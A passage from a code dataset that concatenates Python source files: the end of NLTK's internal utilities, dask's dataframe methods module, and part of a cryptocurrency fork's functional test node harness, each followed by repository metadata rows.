        s = ElementTree.tostring(self._etree, encoding="utf8").decode("utf8")
        if len(s) > 60:
            e = s.rfind("<")
            if (len(s) - e) > 30:
                e = -20
            s = "%s...%s" % (s[:30], s[e:])
        return "<Element %r>" % s
    def __str__(self):
        """
        :return: the result of applying ``ElementTree.tostring()`` to
        the wrapped Element object.
        """
        return (
            ElementTree.tostring(self._etree, encoding="utf8").decode("utf8").rstrip()
        )
    ##////////////////////////////////////////////////////////////
    # { Element interface Delegation (pass-through)
    ##////////////////////////////////////////////////////////////
    def __getattr__(self, attrib):
        return getattr(self._etree, attrib)
    def __setattr__(self, attr, value):
        return setattr(self._etree, attr, value)
    def __delattr__(self, attr):
        return delattr(self._etree, attr)
    def __setitem__(self, index, element):
        self._etree[index] = element
    def __delitem__(self, index):
        del self._etree[index]
    def __setslice__(self, start, stop, elements):
        # NOTE(review): __setslice__/__delslice__ are Python 2 protocols;
        # Python 3 routes slices through __setitem__/__delitem__.
        self._etree[start:stop] = elements
    def __delslice__(self, start, stop):
        del self._etree[start:stop]
    def __len__(self):
        return len(self._etree)
    ##////////////////////////////////////////////////////////////
    # { Element interface Delegation (wrap result)
    ##////////////////////////////////////////////////////////////
    def __getitem__(self, index):
        return ElementWrapper(self._etree[index])
    def __getslice__(self, start, stop):
        return [ElementWrapper(elt) for elt in self._etree[start:stop]]
    def getchildren(self):
        return [ElementWrapper(elt) for elt in self._etree]
    def getiterator(self, tag=None):
        # NOTE(review): Element.getiterator was removed in Python 3.9;
        # this delegation raises AttributeError there — confirm and
        # consider ``iter(tag)``.
        return (ElementWrapper(elt) for elt in self._etree.getiterator(tag))
    def makeelement(self, tag, attrib):
        return ElementWrapper(self._etree.makeelement(tag, attrib))
    def find(self, path):
        elt = self._etree.find(path)
        if elt is None:
            return elt
        else:
            return ElementWrapper(elt)
    def findall(self, path):
        return [ElementWrapper(elt) for elt in self._etree.findall(path)]
######################################################################
# Helper for Handling Slicing
######################################################################
def slice_bounds(sequence, slice_obj, allow_step=False):
    """
    Given a slice, return the corresponding (start, stop) bounds,
    taking into account None indices and negative indices. The
    following guarantees are made for the returned start and stop values:
    - 0 <= start <= len(sequence)
    - 0 <= stop <= len(sequence)
    - start <= stop
    :raise ValueError: If ``slice_obj.step`` is not None.
    :param allow_step: If true, then the slice object may have a
        non-None step. If it does, then return a tuple
        (start, stop, step).
    """
    start, stop = slice_obj.start, slice_obj.stop
    if allow_step:
        step = 1 if slice_obj.step is None else slice_obj.step
        # Recurse without allow_step to resolve the bounds; a negative
        # step swaps the roles (and default values) of start and stop.
        if step < 0:
            start, stop = slice_bounds(sequence, slice(stop, start))
        else:
            start, stop = slice_bounds(sequence, slice(start, stop))
        return start, stop, step
    # Reject non-default steps when they are not allowed.
    if slice_obj.step not in (None, 1):
        raise ValueError(
            "slices with steps are not supported by %s" % sequence.__class__.__name__
        )
    # Supply default offsets.
    start = 0 if start is None else start
    stop = len(sequence) if stop is None else stop
    # Handle negative indices.
    if start < 0:
        start = max(0, len(sequence) + start)
    if stop < 0:
        stop = max(0, len(sequence) + stop)
    # Clamp stop to the end of the sequence without calling len() when
    # possible, since len() may be expensive for lazy sequences.
    if stop > 0:
        try:
            sequence[stop - 1]
        except IndexError:
            stop = len(sequence)
    # Make sure start isn't past stop.
    start = min(start, stop)
    return start, stop
######################################################################
# Permission Checking
######################################################################
def is_writable(path):
    """Return True if *path* exists and the current user may write to it."""
    # Ensure that it exists.
    if not os.path.exists(path):
        return False
    # On non-posix platforms (no getuid) we optimistically assume writable.
    # [xx] should we do other checks on other platforms?
    if not hasattr(os, "getuid"):
        return True
    info = os.stat(path)
    mode = stat.S_IMODE(info.st_mode)
    # World-writable?
    if mode & 0o002:
        return True
    # Owned by us and owner-writable?
    if info.st_uid == os.getuid() and (mode & 0o200):
        return True
    # Writable by one of our groups?
    if (info.st_gid in [os.getgid()] + os.getgroups()) and (mode & 0o020):
        return True
    return False
######################################################################
# NLTK Error reporting
######################################################################
def raise_unorderable_types(ordering, a, b):
    """Raise a TypeError reporting that *a* and *b* cannot be ordered."""
    message = "unorderable types: %s() %s %s()" % (
        type(a).__name__,
        ordering,
        type(b).__name__,
    )
    raise TypeError(message)
| 34.057168 | 99 | 0.554193 |
9f95e5e57836084fbaca4ddce1cff3d5f005ca9d | 17,061 | py | Python | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/methods.py | nickvazz/dask | f6e9e81903bd2416125a97cc3856c63bb792bddf | [
"BSD-3-Clause"
] | null | null | null | import warnings
import numpy as np
import pandas as pd
from pandas.api.types import is_categorical_dtype, union_categoricals
from tlz import partition
from .utils import (
is_series_like,
is_index_like,
is_dataframe_like,
hash_object_dispatch,
group_split_dispatch,
)
from ..utils import Dispatch
# ---------------------------------
# indexing
# ---------------------------------
def loc(df, iindexer, cindexer=None):
    """
    .loc for known divisions
    """
    if cindexer is not None:
        return df.loc[iindexer, cindexer]
    return df.loc[iindexer]
def iloc(df, cindexer=None):
    """Positional column selection: every row of the ``cindexer`` columns."""
    return df.iloc[:, cindexer]
def try_loc(df, iindexer, cindexer=None):
    """
    .loc for unknown divisions
    """
    try:
        # Inline of the `loc` helper: select with or without columns.
        if cindexer is None:
            return df.loc[iindexer]
        return df.loc[iindexer, cindexer]
    except KeyError:
        # Labels not present: return an empty frame with the right columns.
        return df.head(0).loc[:, cindexer]
def boundary_slice(
    df, start, stop, right_boundary=True, left_boundary=True, kind="loc"
):
    """Index slice start/stop. Can switch include/exclude boundaries.
    Examples
    --------
    >>> df = pd.DataFrame({'x': [10, 20, 30, 40, 50]}, index=[1, 2, 2, 3, 4])
    >>> boundary_slice(df, 2, None)
        x
    2  20
    2  30
    3  40
    4  50
    >>> boundary_slice(df, 1, 3)
        x
    1  10
    2  20
    2  30
    3  40
    >>> boundary_slice(df, 1, 3, right_boundary=False)
        x
    1  10
    2  20
    2  30
    Empty input DataFrames are returned
    >>> df_empty = pd.DataFrame()
    >>> boundary_slice(df_empty, 1, 3)
    Empty DataFrame
    Columns: []
    Index: []
    """
    if len(df.index) == 0:
        return df
    # NOTE(review): `Index.is_monotonic` and the 3-argument
    # `get_slice_bound(label, side, kind)` below are pre-pandas-2.0 APIs —
    # confirm the pinned pandas version supports them.
    if kind == "loc" and not df.index.is_monotonic:
        # Pandas treats missing keys differently for label-slicing
        # on monotonic vs. non-monotonic indexes
        # If the index is monotonic, `df.loc[start:stop]` is fine.
        # If it's not, `df.loc[start:stop]` raises when `start` is missing
        if start is not None:
            if left_boundary:
                df = df[df.index >= start]
            else:
                df = df[df.index > start]
        if stop is not None:
            if right_boundary:
                df = df[df.index <= stop]
            else:
                df = df[df.index < stop]
        return df
    else:
        result = getattr(df, kind)[start:stop]
        # A label slice is inclusive at both ends; trim the excluded
        # boundary rows positionally when requested.
        if not right_boundary and stop is not None:
            right_index = result.index.get_slice_bound(stop, "left", kind)
            result = result.iloc[:right_index]
        if not left_boundary and start is not None:
            left_index = result.index.get_slice_bound(start, "right", kind)
            result = result.iloc[left_index:]
        return result
def index_count(x):
    # Workaround since Index doesn't implement `.count`
    nonnull = pd.notnull(x)
    return nonnull.sum()
def mean_aggregate(s, n):
    """Finalize a mean: total *s* over count *n*, mapping /0 to NaN."""
    try:
        # Suppress (but still trigger) any warnings raised by the division.
        with warnings.catch_warnings(record=True):
            warnings.simplefilter("always")
            result = s / n
        return result
    except ZeroDivisionError:
        # Scalar integer division by zero raises instead of producing inf.
        return np.float64(np.nan)
def wrap_var_reduction(array_var, index):
    """Wrap an ndarray/list variance result in a Series; pass others through."""
    if isinstance(array_var, (np.ndarray, list)):
        return pd.Series(array_var, index=index)
    return array_var
def wrap_skew_reduction(array_skew, index):
    """Wrap an ndarray/list skew result in a Series; pass others through."""
    if isinstance(array_skew, (np.ndarray, list)):
        return pd.Series(array_skew, index=index)
    return array_skew
def wrap_kurtosis_reduction(array_kurtosis, index):
    """Wrap an ndarray/list kurtosis result in a Series; pass others through."""
    if isinstance(array_kurtosis, (np.ndarray, list)):
        return pd.Series(array_kurtosis, index=index)
    return array_kurtosis
def var_mixed_concat(numeric_var, timedelta_var, columns):
    """Combine numeric and timedelta variance results, ordered by *columns*."""
    combined = pd.concat([numeric_var, timedelta_var])
    return combined.reindex(index=columns)
def describe_aggregate(values):
    """Concatenate per-partition ``describe`` results into one frame."""
    assert len(values) > 0
    # Collect statistic labels, shortest index first and without
    # duplicates, so categorical and numeric stats are arranged together.
    names = []
    for idx in sorted((v.index for v in values), key=len):
        for label in idx:
            if label not in names:
                names.append(label)
    return pd.concat(values, axis=1, sort=False).reindex(names)
def describe_numeric_aggregate(stats, name=None, is_timedelta_col=False):
    """Assemble the final ``describe`` result for a numeric column.

    :param stats: the six partial results, in order:
        (count, mean, std, min, quantiles, max).
    :param name: name given to the result when it is a Series.
    :param is_timedelta_col: if True, coerce the moment statistics back
        to timedelta before assembling the output.
    """
    assert len(stats) == 6
    count, mean, std, min, q, max = stats
    # Use the count's frame type when available so Series/DataFrame
    # inputs produce matching outputs.
    if is_series_like(count):
        typ = type(count.to_frame())
    else:
        typ = type(q)
    if is_timedelta_col:
        mean = pd.to_timedelta(mean)
        std = pd.to_timedelta(std)
        min = pd.to_timedelta(min)
        max = pd.to_timedelta(max)
        q = q.apply(lambda x: pd.to_timedelta(x))
    part1 = typ([count, mean, std, min], index=["count", "mean", "std", "min"])
    # Render quantile labels as percentages, e.g. 0.25 -> "25%".
    q.index = ["{0:g}%".format(l * 100) for l in tolist(q.index)]
    if is_series_like(q) and typ != type(q):
        q = q.to_frame()
    part3 = typ([max], index=["max"])
    result = concat([part1, q, part3], sort=False)
    if is_series_like(result):
        result.name = name
    return result
def describe_nonnumeric_aggregate(stats, name):
    """Assemble the final ``describe`` result for a non-numeric column.

    :param stats: either ``(nunique, count, top_freq)`` for categorical
        columns, or ``(nunique, count, top_freq, min_ts, max_ts)`` for
        datetime columns.
    :param name: name given to the resulting Series.
    :return: a Series of summary statistics.
    """
    args_len = len(stats)
    is_datetime_column = args_len == 5
    is_categorical_column = args_len == 3
    assert is_datetime_column or is_categorical_column
    if is_categorical_column:
        nunique, count, top_freq = stats
    else:
        nunique, count, top_freq, min_ts, max_ts = stats
    # Input was an empty dataframe/series.
    # (Cleanup: the original built this via dead `dtype = None` plus
    # list mutations; the values are constant, so build them directly.)
    if len(top_freq) == 0:
        return pd.Series(
            [0, 0, None, None],
            index=["count", "unique", "top", "freq"],
            dtype=object,
            name=name,
        )
    top = top_freq.index[0]
    freq = top_freq.iloc[0]
    index = ["unique", "count", "top", "freq"]
    values = [nunique, count]
    if is_datetime_column:
        tz = top.tz
        top = pd.Timestamp(top)
        if top.tzinfo is not None and tz is not None:
            # Don't tz_localize(None) if key is already tz-aware
            top = top.tz_convert(tz)
        else:
            top = top.tz_localize(tz)
        first = pd.Timestamp(min_ts, tz=tz)
        last = pd.Timestamp(max_ts, tz=tz)
        index.extend(["first", "last"])
        values.extend([top, freq, first, last])
    else:
        values.extend([top, freq])
    return pd.Series(values, index=index, name=name)
def _cum_aggregate_apply(aggregate, x, y):
"""Apply aggregation function within a cumulative aggregation
Parameters
----------
aggregate: function (a, a) -> a
The aggregation function, like add, which is used to and subsequent
results
x:
y:
"""
if y is None:
return x
else:
return aggregate(x, y)
def cumsum_aggregate(x, y):
    """Combine two cumulative-sum partials; None means "no value yet"."""
    if x is None:
        return y
    if y is None:
        return x
    return x + y
def cumprod_aggregate(x, y):
    """Combine two cumulative-product partials; None means "no value yet"."""
    if x is None:
        return y
    if y is None:
        return x
    return x * y
def cummin_aggregate(x, y):
    """Combine two running-minimum partials (frame/series or scalar)."""
    if is_series_like(x) or is_dataframe_like(x):
        # Keep x wherever it is smaller or missing; otherwise take y.
        return x.where((x < y) | x.isnull(), y, axis=x.ndim - 1)
    # scalar
    return x if x < y else y
def cummax_aggregate(x, y):
    """Combine two running-maximum partials (frame/series or scalar)."""
    if is_series_like(x) or is_dataframe_like(x):
        # Keep x wherever it is larger or missing; otherwise take y.
        return x.where((x > y) | x.isnull(), y, axis=x.ndim - 1)
    # scalar
    return x if x > y else y
def assign(df, *pairs):
    """Assign flattened ``name, value`` pairs as columns on a copy of *df*."""
    pairs = dict(partition(2, pairs))
    # Only deep copy when updating an element
    # (to avoid modifying the original)
    deep = bool(set(pairs) & set(df.columns))
    out = df.copy(deep=bool(deep))
    for name, val in pairs.items():
        out[name] = val
    return out
def unique(x, series_name=None):
    """Return the distinct values of *x*, wrapped as a Series when needed."""
    out = x.unique()
    # ``unique`` may hand back a bare ndarray; wrap it so callers always
    # receive a series/index-like object.
    if is_series_like(out) or is_index_like(out):
        return out
    return pd.Series(out, name=series_name)
def value_counts_combine(x, sort=True, ascending=False, **groupby_kwargs):
    # sort/ascending only matter at the aggregate step; here we just
    # re-sum counts that share the same index label.
    grouped = x.groupby(level=0, **groupby_kwargs)
    return grouped.sum()
def value_counts_aggregate(
    x, sort=True, ascending=False, normalize=False, total_length=None, **groupby_kwargs
):
    """Final value_counts step: combine partials, then normalize/sort."""
    out = value_counts_combine(x, **groupby_kwargs)
    if normalize:
        denominator = out.sum() if total_length is None else total_length
        out /= denominator
    if sort:
        out = out.sort_values(ascending=ascending)
    return out
def nbytes(x):
    """Return the number of bytes in ``x``'s underlying data (``.nbytes``)."""
    return x.nbytes
def size(x):
    """Return the number of elements in ``x`` (``.size``)."""
    return x.size
def values(df):
    """Return the values of ``df`` as an ndarray (``.values``)."""
    return df.values
def sample(df, state, frac, replace):
    """Deterministically sample a fraction of *df* (no-op on empty frames)."""
    if len(df) == 0:
        return df
    rng = np.random.RandomState(state)
    return df.sample(random_state=rng, frac=frac, replace=replace)
def drop_columns(df, columns, dtype):
    """Drop *columns* from *df* and coerce the remaining column index dtype."""
    out = df.drop(columns, axis=1)
    out.columns = out.columns.astype(dtype)
    return out
def fillna_check(df, method, check=True):
    """Forward/backward fill, optionally erroring on an all-NaN partition."""
    out = df.fillna(method=method)
    if check:
        # A column that is still entirely NaN means the fill had no source
        # values in this partition.
        if out.isnull().values.all(axis=0).any():
            raise ValueError(
                "All NaN partition encountered in `fillna`. Try "
                "using ``df.repartition`` to increase the partition "
                "size, or specify `limit` in `fillna`."
            )
    return out
# ---------------------------------
# reshape
# ---------------------------------
def pivot_agg(df):
    """Sum partial pivot tables that share index labels."""
    grouped = df.groupby(level=0)
    return grouped.sum()
def pivot_sum(df, index, columns, values):
    """Per-partition pivot table using a sum aggregation (keeps NaN cells)."""
    return pd.pivot_table(
        df,
        index=index,
        columns=columns,
        values=values,
        aggfunc="sum",
        dropna=False,
    )
def pivot_count(df, index, columns, values):
    # we cannot determine dtype until concatenationg all partitions.
    # make dtype deterministic, always coerce to np.float64
    table = pd.pivot_table(
        df, index=index, columns=columns, values=values, aggfunc="count", dropna=False
    )
    return table.astype(np.float64)
# ---------------------------------
# concat
# ---------------------------------
# Dispatch table mapping frame types to a concat implementation
# (the pandas handler is registered below; other backends register theirs).
concat_dispatch = Dispatch("concat")
def concat(
    dfs,
    axis=0,
    join="outer",
    uniform=False,
    filter_warning=True,
    ignore_index=False,
    **kwargs
):
    """Concatenate, handling some edge cases:
    - Unions categoricals between partitions
    - Ignores empty partitions
    Parameters
    ----------
    dfs : list of DataFrame, Series, or Index
    axis : int or str, optional
    join : str, optional
    uniform : bool, optional
        Whether to treat ``dfs[0]`` as representative of ``dfs[1:]``. Set to
        True if all arguments have the same columns and dtypes (but not
        necessarily categories). Default is False.
    ignore_index : bool, optional
        Whether to allow index values to be ignored/droped during
        concatenation. Default is False.
    """
    # Single input: nothing to concatenate.
    if len(dfs) == 1:
        return dfs[0]
    # Pick the implementation registered for the concrete frame type.
    handler = concat_dispatch.dispatch(type(dfs[0]))
    return handler(
        dfs,
        axis=axis,
        join=join,
        uniform=uniform,
        filter_warning=filter_warning,
        ignore_index=ignore_index,
        **kwargs
    )
@concat_dispatch.register((pd.DataFrame, pd.Series, pd.Index))
def concat_pandas(
    dfs,
    axis=0,
    join="outer",
    uniform=False,
    filter_warning=True,
    ignore_index=False,
    **kwargs
):
    """Pandas implementation of ``concat``: unions categoricals across
    partitions (both in columns and in the index) so the result keeps a
    categorical dtype instead of being coerced to object."""
    if axis == 1:
        return pd.concat(dfs, axis=axis, join=join, **kwargs)
    # Support concatenating indices along axis 0
    if isinstance(dfs[0], pd.Index):
        if isinstance(dfs[0], pd.CategoricalIndex):
            # Coerce the remaining indices so union_categoricals accepts them.
            for i in range(1, len(dfs)):
                if not isinstance(dfs[i], pd.CategoricalIndex):
                    dfs[i] = dfs[i].astype("category")
            return pd.CategoricalIndex(union_categoricals(dfs), name=dfs[0].name)
        elif isinstance(dfs[0], pd.MultiIndex):
            first, rest = dfs[0], dfs[1:]
            if all(
                (isinstance(o, pd.MultiIndex) and o.nlevels >= first.nlevels)
                for o in rest
            ):
                # Concatenate level-by-level to preserve per-level dtypes.
                arrays = [
                    concat([i._get_level_values(n) for i in dfs])
                    for n in range(first.nlevels)
                ]
                return pd.MultiIndex.from_arrays(arrays, names=first.names)
            to_concat = (first.values,) + tuple(k._values for k in rest)
            new_tuples = np.concatenate(to_concat)
            try:
                return pd.MultiIndex.from_tuples(new_tuples, names=first.names)
            except Exception:
                return pd.Index(new_tuples)
        return dfs[0].append(dfs[1:])
    # Handle categorical index separately
    dfs0_index = dfs[0].index
    has_categoricalindex = isinstance(dfs0_index, pd.CategoricalIndex) or (
        isinstance(dfs0_index, pd.MultiIndex)
        and any(isinstance(i, pd.CategoricalIndex) for i in dfs0_index.levels)
    )
    if has_categoricalindex:
        # Concatenate the data positionally and rebuild the index afterwards.
        dfs2 = [df.reset_index(drop=True) for df in dfs]
        ind = concat([df.index for df in dfs])
    else:
        dfs2 = dfs
        ind = None
    # Concatenate the partitions together, handling categories as needed
    if (
        isinstance(dfs2[0], pd.DataFrame)
        if uniform
        else any(isinstance(df, pd.DataFrame) for df in dfs2)
    ):
        if uniform:
            dfs3 = dfs2
            cat_mask = dfs2[0].dtypes == "category"
        else:
            # When concatenating mixed dataframes and series on axis 1, Pandas
            # converts series to dataframes with a single column named 0, then
            # concatenates.
            dfs3 = [
                df
                if isinstance(df, pd.DataFrame)
                else df.to_frame().rename(columns={df.name: 0})
                for df in dfs2
            ]
            # pandas may raise a RuntimeWarning for comparing ints and strs
            with warnings.catch_warnings():
                warnings.simplefilter("ignore", RuntimeWarning)
                if filter_warning:
                    warnings.simplefilter("ignore", FutureWarning)
                cat_mask = pd.concat(
                    [(df.dtypes == "category").to_frame().T for df in dfs3],
                    join=join,
                    **kwargs
                ).any()
        if cat_mask.any():
            # Concatenate the non-categorical columns normally, then union
            # each categorical column across partitions by hand.
            not_cat = cat_mask[~cat_mask].index
            # this should be aligned, so no need to filter warning
            out = pd.concat(
                [df[df.columns.intersection(not_cat)] for df in dfs3],
                join=join,
                **kwargs
            )
            temp_ind = out.index
            for col in cat_mask.index.difference(not_cat):
                # Find an example of categoricals in this column
                for df in dfs3:
                    sample = df.get(col)
                    if sample is not None:
                        break
                # Extract partitions, subbing in missing if needed
                parts = []
                for df in dfs3:
                    if col in df.columns:
                        parts.append(df[col])
                    else:
                        # Missing column: fill with all-NA codes (-1).
                        codes = np.full(len(df), -1, dtype="i8")
                        data = pd.Categorical.from_codes(
                            codes, sample.cat.categories, sample.cat.ordered
                        )
                        parts.append(data)
                out[col] = union_categoricals(parts)
                # Pandas resets index type on assignment if frame is empty
                # https://github.com/pandas-dev/pandas/issues/17101
                if not len(temp_ind):
                    out.index = temp_ind
            out = out.reindex(columns=cat_mask.index)
        else:
            # pandas may raise a RuntimeWarning for comparing ints and strs
            with warnings.catch_warnings():
                warnings.simplefilter("ignore", RuntimeWarning)
                if filter_warning:
                    warnings.simplefilter("ignore", FutureWarning)
                out = pd.concat(dfs3, join=join, sort=False)
    else:
        if is_categorical_dtype(dfs2[0].dtype):
            if ind is None:
                ind = concat([df.index for df in dfs2])
            return pd.Series(union_categoricals(dfs2), index=ind, name=dfs2[0].name)
        with warnings.catch_warnings():
            if filter_warning:
                warnings.simplefilter("ignore", FutureWarning)
            out = pd.concat(dfs2, join=join, **kwargs)
    # Re-add the index if needed
    if ind is not None:
        out.index = ind
    return out
# Dispatch table mapping container types to a ``tolist`` implementation.
tolist_dispatch = Dispatch("tolist")
def tolist(obj):
    """Convert ``obj`` to a plain Python list via the type-dispatched handler."""
    return tolist_dispatch.dispatch(type(obj))(obj)
@tolist_dispatch.register((pd.Series, pd.Index, pd.Categorical))
def tolist_pandas(obj):
    # pandas objects expose a native ``tolist`` yielding Python scalars.
    return obj.tolist()
# cuDF may try to import old dispatch functions
# Backwards-compatibility aliases for the renamed dispatch objects; kept so
# external libraries importing the old names keep working.
hash_df = hash_object_dispatch
group_split = group_split_dispatch
def assign_index(df, ind):
    """Return a copy of ``df`` whose index has been replaced by ``ind``.

    The input frame/series is left untouched; only the copy is mutated.
    """
    reindexed = df.copy()
    reindexed.index = ind
    return reindexed
| 28.482471 | 88 | 0.588184 |
cccafdba54829927068eb981f9ad4d22b7639dfa | 11,066 | py | Python | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 24 | 2018-05-08T15:01:48.000Z | 2022-03-27T19:33:35.000Z | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 1 | 2019-08-04T07:13:02.000Z | 2019-11-10T18:53:23.000Z | test/functional/test_framework/test_node.py | AFP99/rpicore | cc739f0b74442bfde4e5a7975d7b87166c5dd227 | [
"MIT"
] | 12 | 2018-06-04T09:31:59.000Z | 2022-02-17T00:42:18.000Z | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for rpicoind node under test"""
import decimal
import errno
import http.client
import json
import logging
import os
import re
import subprocess
import time
from .authproxy import JSONRPCException
from .util import (
assert_equal,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
# (json.JSONDecodeError only exists on 3.5+; older json raises ValueError)
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
# Seconds to wait for a rpicoind process to exit.
# NOTE(review): upstream Bitcoin Core uses 60 here; this fork raised it to 600,
# presumably for slow hardware — confirm intentional.
BITCOIND_PROC_WAIT_TIMEOUT = 600
class TestNode():
    """A class for representing a rpicoind node under test.
    This class contains:
    - state about the node (whether it's running, etc)
    - a Python subprocess.Popen object representing the running process
    - an RPC connection to the node
    - one or more P2P connections to the node
    To make things easier for the test writer, any unrecognised messages will
    be dispatched to the RPC connection."""
    def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir, use_cli=False):
        self.index = i
        self.datadir = os.path.join(dirname, "node" + str(i))
        self.rpchost = rpchost
        if timewait:
            self.rpc_timeout = timewait
        else:
            # Wait for up to 60 seconds for the RPC server to respond
            # NOTE(review): comment says 60 seconds but the value is 600 —
            # confirm which one is intended.
            self.rpc_timeout = 600
        if binary is None:
            self.binary = os.getenv("BITCOIND", "rpicoind")
        else:
            self.binary = binary
        self.stderr = stderr
        self.coverage_dir = coverage_dir
        # Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly.
        self.extra_args = extra_args
        self.args = [self.binary, "-datadir=" + self.datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-logtimemicros", "-debug", "-debugexclude=libevent", "-debugexclude=leveldb", "-mocktime=" + str(mocktime), "-uacomment=testnode%d" % i]
        self.cli = TestNodeCLI(os.getenv("BITCOINCLI", "rpicoin-cli"), self.datadir)
        self.use_cli = use_cli
        # Process/RPC state; populated by start()/wait_for_rpc_connection().
        self.running = False
        self.process = None
        self.rpc_connected = False
        self.rpc = None
        self.url = None
        self.log = logging.getLogger('TestFramework.node%d' % i)
        self.cleanup_on_exit = True # Whether to kill the node when this object goes away
        self.p2ps = []
    def __del__(self):
        # Ensure that we don't leave any bitcoind processes lying around after
        # the test ends
        if self.process and self.cleanup_on_exit:
            # Should only happen on test failure
            # Avoid using logger, as that may have already been shutdown when
            # this destructor is called.
            print("Cleaning up leftover process")
            self.process.kill()
    def __getattr__(self, name):
        """Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
        if self.use_cli:
            return getattr(self.cli, name)
        else:
            assert self.rpc_connected and self.rpc is not None, "Error: no RPC connection"
            return getattr(self.rpc, name)
    def start(self, extra_args=None, stderr=None, *args, **kwargs):
        """Start the node."""
        if extra_args is None:
            extra_args = self.extra_args
        if stderr is None:
            stderr = self.stderr
        # Delete any existing cookie file -- if such a file exists (eg due to
        # unclean shutdown), it will get overwritten anyway by bitcoind, and
        # potentially interfere with our attempt to authenticate
        delete_cookie_file(self.datadir)
        self.process = subprocess.Popen(self.args + extra_args, stderr=stderr, *args, **kwargs)
        self.running = True
        self.log.debug("rpicoind started, waiting for RPC to come up")
    def wait_for_rpc_connection(self):
        """Sets up an RPC connection to the rpicoind process. Returns False if unable to connect."""
        # Poll at a rate of four times per second
        poll_per_s = 4
        # NOTE(review): unconditional 5 s startup delay (not present in
        # upstream Bitcoin Core) — presumably for slow hardware; confirm.
        time.sleep(5)
        for _ in range(poll_per_s * self.rpc_timeout):
            assert self.process.poll() is None, "rpicoind exited with status %i during initialization" % self.process.returncode
            try:
                self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
                while self.rpc.getblockcount() < 0:
                    time.sleep(1)
                # If the call to getblockcount() succeeds then the RPC connection is up
                self.rpc_connected = True
                self.url = self.rpc.url
                self.log.debug("RPC successfully started")
                return
            except IOError as e:
                if e.errno != errno.ECONNREFUSED: # Port not yet open?
                    raise # unknown IO error
            except JSONRPCException as e: # Initialization phase
                if e.error['code'] != -28: # RPC in warmup?
                    raise # unknown JSON RPC exception
            except ValueError as e: # cookie file not found and no rpcuser or rpcassword. bitcoind still starting
                if "No RPC credentials" not in str(e):
                    raise
            time.sleep(1.0 / poll_per_s)
        raise AssertionError("Unable to connect to rpicoind")
    def get_wallet_rpc(self, wallet_name):
        # Returns an RPC/CLI handle scoped to the given wallet.
        if self.use_cli:
            return self.cli("-rpcwallet={}".format(wallet_name))
        else:
            assert self.rpc_connected
            assert self.rpc
            wallet_path = "wallet/%s" % wallet_name
            return self.rpc / wallet_path
    def stop_node(self):
        """Stop the node."""
        if not self.running:
            return
        self.log.debug("Stopping node")
        try:
            self.stop()
        except http.client.CannotSendRequest:
            self.log.exception("Unable to stop node.")
        del self.p2ps[:]
    def is_node_stopped(self):
        """Checks whether the node has stopped.
        Returns True if the node has stopped. False otherwise.
        This method is responsible for freeing resources (self.process)."""
        # NOTE(review): unconditional 20 s delay on every poll (not in
        # upstream) — this makes wait_until_stopped very slow; confirm needed.
        time.sleep(20)
        if not self.running:
            return True
        return_code = self.process.poll()
        if return_code is None:
            return False
        # process has stopped. Assert that it didn't return an error code.
        assert_equal(return_code, 0)
        self.running = False
        self.process = None
        self.rpc_connected = False
        self.rpc = None
        self.log.debug("Node stopped")
        return True
    def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
        # Blocks until is_node_stopped() returns True or the timeout elapses.
        wait_until(self.is_node_stopped, timeout=timeout)
    def node_encrypt_wallet(self, passphrase):
        """Encrypts the wallet.
        This causes rpicoind to shutdown, so this method takes
        care of cleaning up resources."""
        self.encryptwallet(passphrase)
        self.wait_until_stopped()
    def add_p2p_connection(self, p2p_conn, *args, **kwargs):
        """Add a p2p connection to the node.
        This method adds the p2p connection to the self.p2ps list and also
        returns the connection to the caller."""
        if 'dstport' not in kwargs:
            kwargs['dstport'] = p2p_port(self.index)
        if 'dstaddr' not in kwargs:
            kwargs['dstaddr'] = '127.0.0.1'
        p2p_conn.peer_connect(*args, **kwargs)
        self.p2ps.append(p2p_conn)
        return p2p_conn
    @property
    def p2p(self):
        """Return the first p2p connection
        Convenience property - most tests only use a single p2p connection to each
        node, so this saves having to write node.p2ps[0] many times."""
        assert self.p2ps, "No p2p connection"
        return self.p2ps[0]
    def disconnect_p2ps(self):
        """Close all p2p connections to the node."""
        for p in self.p2ps:
            p.peer_disconnect()
        del self.p2ps[:]
class TestNodeCLIAttr:
    """Callable proxy binding one rpicoin-cli command name to a TestNodeCLI.

    Calling the proxy executes the command immediately; ``get_request``
    instead returns a zero-argument callable for deferred/batched execution.
    """
    def __init__(self, cli, command):
        self.cli = cli
        self.command = command

    def __call__(self, *args, **kwargs):
        dispatch = self.cli.send_cli
        return dispatch(self.command, *args, **kwargs)

    def get_request(self, *args, **kwargs):
        def request():
            return self(*args, **kwargs)
        return request
class TestNodeCLI():
    """Interface to rpicoin-cli for an individual node"""
    def __init__(self, binary, datadir):
        self.options = []
        self.binary = binary
        self.datadir = datadir
        self.input = None
        self.log = logging.getLogger('TestFramework.bitcoincli')
    def __call__(self, *options, input=None):
        # TestNodeCLI is callable with rpicoin-cli command-line options
        # Returns a NEW instance with the options bound, enabling chained
        # usage such as node.cli("-rpcwallet=w").getbalance().
        cli = TestNodeCLI(self.binary, self.datadir)
        cli.options = [str(o) for o in options]
        cli.input = input
        return cli
    def __getattr__(self, command):
        # Any unknown attribute becomes a callable bound to that RPC command.
        return TestNodeCLIAttr(self, command)
    def batch(self, requests):
        # Runs each deferred request, collecting either its result or the
